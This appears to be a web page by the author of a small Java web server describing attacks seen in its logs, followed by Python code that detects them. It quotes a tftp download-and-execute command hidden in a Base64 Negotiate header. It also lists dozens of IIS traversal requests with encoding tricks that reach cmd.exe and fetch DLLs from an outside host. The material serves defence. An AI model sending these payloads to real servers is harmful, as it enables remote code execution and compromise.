Attacks & Spying

Over the longer operation of the JWebServer I repeatedly receive various attacks and espionage attempts.

tftp attack:
I receive this attack on average every hour:
GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Authorization: Negotiate YIIQegYGKwYBBQUCoIIQbjCCE...
If one decodes the character sequence after "Negotiate" (roughly 6 KB long) with the Base64 procedure, this character sequence contains, for example, the following string:
cmd /c tftp -i 172.179.185.131 GET NPFMONTR.exe&start NPFMONTR.exe&exit
The IP address and the name of the EXE file vary constantly (e.g. ms-wks32.exe, cgy32win.exe). The download via tftp is only possible within 3 minutes of the request; afterwards one gets a timeout. The EXE files are encoded with PolyCrypt from JLabSoftware (http://jlabsoftware.com/).
When this character sequence is executed (e.g. at the DOS prompt), "NPFMONTR.exe" is downloaded by the tftp program (Trivial File Transfer Protocol) and then executed. I do not believe that this execution is in the interest of the server.
As far as I have investigated it, there is a security hole in the Microsoft server. It nevertheless remains doubtful to me why a server should execute such a character sequence at all.

Spying/Attack:
An espionage attack tried the following requests. The "Host:" header was always "www", and the "Connection:" parameter was always "close". Within a time interval of 50 seconds I received the following 76 requests (i.e. faster than one per second!):
- GET /scripts/root.exe?/c+dir HTTP/1.0
- GET /scripts/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /scripts/httpodbc.dll HTTP/1.0
- GET /MSADC/root.exe?/c+dir HTTP/1.0
- GET /MSADC/root.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20httpodbc.dll HTTP/1.0
- GET /MSADC/httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0 
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /c/httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /d/httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%255c../httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_vti_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /_mem_bin/..%255c../..%255c../..%255c../httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%1c../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%2f../httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c0%af../httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%c1%9c../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%%35c../httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%25%35%63../httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20172.16.1.34%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0
- GET /scripts/..%252f../httpodbc.dll HTTP/1.0
In general, these requests try to reach parent directories, e.g. via the "scripts/" directory and the "../" operator. If one were, for example, in Java to simply build a File object from the GET request and then transmit that file to the client, this espionage attempt would have at least partial success!
They also try to execute various DOS commands (tftp, dir, cmd.exe, root.exe, etc.) and to overwrite certain DLL files via the tftp command.
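As an added example (not code from JWebServer or this page's author), the following Python checks cover both observations above: it decodes a request path the way the listed requests require (repeated percent-decoding plus the overlong UTF-8 byte pairs), reports whether the "../" segments climb above the document root, and base64-decodes a Negotiate token to find an embedded "cmd /c ... &exit" command like the one from the tftp attack. The sample token is constructed here from the SPNEGO prefix the page quotes plus the quoted command; the three-round decode limit and the byte-pair table are assumptions.

```python
import base64
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 byte pairs from the page's requests that IIS once took as '/' and '\' (assumed table).
OVERLONG = ((b"\xc0\xaf", b"/"), (b"\xc0\x2f", b"/"), (b"\xc1\x9c", b"\\"), (b"\xc1\x1c", b"\\"))
# Shape of the command the page found inside the Negotiate token: "cmd /c ... &exit".
NEGOTIATE_CMD_RE = re.compile(rb"cmd /c .{0,200}?&exit", re.S)

def decode_path(raw, rounds=3):
    """Decode repeatedly (%255c -> %5c -> '\\', %%35%63 -> %5c -> '\\'), then map overlong pairs."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        step = unquote_to_bytes(data)
        if step == data:
            break
        data = step
    for overlong, sep in OVERLONG:
        data = data.replace(overlong, sep)
    return data.decode("latin-1").replace("\\", "/")   # one separator for the depth check

def escapes_root(request_target):
    """True when a decoded '..' segment would climb above the document root."""
    depth = 0
    for seg in decode_path(request_target.partition("?")[0]).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False

def negotiate_command(header):
    """Return the 'cmd /c ...&exit' string hidden in a Negotiate token, or None."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "negotiate":
        return None
    clean = re.sub(r"[^A-Za-z0-9+/]", "", token)   # drop whitespace and the '...'
    try:
        blob = base64.b64decode(clean + "=" * (-len(clean) % 4))
    except ValueError:
        return None
    m = NEGOTIATE_CMD_RE.search(blob)
    return m.group(0) if m else None

# Constructed sample token: SPNEGO prefix (the page's "YIIQegYGKwYBBQUC") plus the quoted command.
SAMPLE_TOKEN = base64.b64encode(
    b"\x60\x82\x10\x7a\x06\x06\x2b\x06\x01\x05\x05\x02" + b"\x00" * 16
    + b"cmd /c tftp -i 172.179.185.131 GET NPFMONTR.exe&start NPFMONTR.exe&exit").decode()
```

A server that resolves the decoded path and rejects anything for which escapes_root is true never hands out a file above its document root, regardless of which encoding variant in the list was used.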